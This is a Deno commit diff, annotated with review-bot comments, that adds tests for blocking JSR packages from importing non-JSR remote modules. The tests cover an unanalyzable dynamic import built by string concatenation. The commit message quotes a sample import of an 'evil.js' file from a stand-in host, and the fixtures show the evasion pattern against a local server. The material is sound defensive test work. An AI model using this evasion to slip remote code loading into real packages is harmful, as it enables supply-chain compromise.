authorDavid Sherret <dsherret@users.noreply.github.com>2024-02-28 16:30:45 -0500
committerGitHub <noreply@github.com>2024-02-28 16:30:45 -0500
commit918c5e648f4bd08d768374ccde1b451b84793b76 (patch)
treed8fd19eefae2f816d7301336413b49a08b9803e3 /tests
parentf54acb53ed917eab1c7a2ba62e73963f9632d3df (diff)
fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)
A security feature of JSR is that it is self-contained, other than npm dependencies. At publish time, the registry rejects packages that contain code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze. This PR prevents Deno from loading dynamic imports that do this.
Diffstat (limited to 'tests')
-rw-r--r--tests/integration/jsr_tests.rs16
-rw-r--r--tests/testdata/jsr/import_https_url/analyzable.out8
-rw-r--r--tests/testdata/jsr/import_https_url/analyzable.ts1
-rw-r--r--tests/testdata/jsr/import_https_url/unanalyzable.out7
-rw-r--r--tests/testdata/jsr/import_https_url/unanalyzable.ts1
-rw-r--r--tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts1
-rw-r--r--tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts5
-rw-r--r--tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json6
-rw-r--r--tests/testdata/jsr/registry/@denotest/import-https-url/meta.json5
9 files changed, 50 insertions, 0 deletions
diff --git a/tests/integration/jsr_tests.rs b/tests/integration/jsr_tests.rs
index fa8a9d8b9..25a0c8663 100644
--- a/tests/integration/jsr_tests.rs
+++ b/tests/integration/jsr_tests.rs
@@ -60,6 +60,22 @@ itest!(deps_info {
http_server: true,
});
+itest!(import_https_url_analyzable {
+ args: "run -A jsr/import_https_url/analyzable.ts",
+ output: "jsr/import_https_url/analyzable.out",
+ envs: env_vars_for_jsr_tests(),
+ http_server: true,
+ exit_code: 1,
+});
+
+itest!(import_https_url_unanalyzable {
+ args: "run -A jsr/import_https_url/unanalyzable.ts",
+ output: "jsr/import_https_url/unanalyzable.out",
+ envs: env_vars_for_jsr_tests(),
+ http_server: true,
+ exit_code: 1,
+});
+
itest!(subset_type_graph {
args: "check --all jsr/subset_type_graph/main.ts",
output: "jsr/subset_type_graph/main.check.out",
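Review bot: Neither `import_https_url_analyzable` nor `import_https_url_unanalyzable` checks the allowed direction — a dynamic import of a `jsr:` or `npm:` specifier from inside a JSR package still resolving — so an over-broad check in the loader would pass this suite unnoticed; a third case with `exit_code: 0` next to these two would pin that. Both new cases also only exercise a plain `http://` target on the local test server, while the commit description talks about `https://`; since the implementation is outside this diff (limited to `tests`), whether both schemes go through the same rule cannot be confirmed from here. The surrounding `itest!` list continues outside the hunk.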
diff --git a/tests/testdata/jsr/import_https_url/analyzable.out b/tests/testdata/jsr/import_https_url/analyzable.out
new file mode 100644
index 000000000..dd1ca58b4
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.out
@@ -0,0 +1,8 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts
+Download http://localhost:4545/welcome.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import("http://localhost:4545/welcome.ts");
+^
+ at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts:1:1
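Review bot: The expected output line `Download http://localhost:4545/welcome.ts` shows the non-JSR module being fetched before the import is rejected, whereas `unanalyzable.out` shows no such download; the outbound request itself is part of what the policy is meant to prevent, so if this ordering is intentional (URL discovered during graph analysis, blocked only at load) it deserves a comment in the fixture or a follow-up to reject before fetching. This is inferred from the fixture text alone, as the loader change is not in this diff.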
diff --git a/tests/testdata/jsr/import_https_url/analyzable.ts b/tests/testdata/jsr/import_https_url/analyzable.ts
new file mode 100644
index 000000000..44382867f
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/analyzable";
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.out b/tests/testdata/jsr/import_https_url/unanalyzable.out
new file mode 100644
index 000000000..4ae04996c
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.out
@@ -0,0 +1,7 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import(nonAnalyzableUrl());
+^
+ at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts:5:1
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.ts b/tests/testdata/jsr/import_https_url/unanalyzable.ts
new file mode 100644
index 000000000..87ccdcfdc
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/unanalyzable";
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts
new file mode 100644
index 000000000..b1b64d82f
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/analyzable.ts
@@ -0,0 +1 @@
+await import("http://localhost:4545/welcome.ts");
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts
new file mode 100644
index 000000000..63001d15f
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0/unanalyzable.ts
@@ -0,0 +1,5 @@
+function nonAnalyzableUrl() {
+ return "http://localhost:4545/" + "welcome.ts";
+}
+
+await import(nonAnalyzableUrl());
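Review bot: `nonAnalyzableUrl` hides the URL from static analysis by concatenating two string literals, but nothing in the fixture states that intent, and a constant-folding improvement to the analyzer would silently turn this case into a duplicate of `analyzable.ts` instead of failing. Add a comment above the function such as `// URL assembled at runtime so the registry's static analysis cannot see it; keep this non-literal on purpose.` so a future edit does not "simplify" it into a literal.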
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json
new file mode 100644
index 000000000..23b877080
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/1.0.0_meta.json
@@ -0,0 +1,6 @@
+{
+ "exports": {
+ "./unanalyzable": "./unanalyzable.ts",
+ "./analyzable": "./analyzable.ts"
+ }
+}
diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
new file mode 100644
index 000000000..02601e4d0
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
@@ -0,0 +1,5 @@
+{
+ "versions": {
+ "1.0.0": {}
+ }
+}